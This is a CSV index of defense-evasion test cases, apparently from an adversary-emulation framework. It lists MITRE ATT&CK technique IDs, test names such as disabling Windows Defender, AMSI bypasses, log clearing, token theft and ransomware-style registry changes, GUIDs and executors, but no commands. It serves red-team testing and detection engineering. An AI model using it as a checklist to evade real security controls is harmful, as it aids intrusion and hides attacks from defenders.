defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,8,Decompile Local CHM File,20cb05e0-1fa5-406d-92c1-84da4ba01813,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,27,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,28,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,29,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,30,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,31,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,32,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
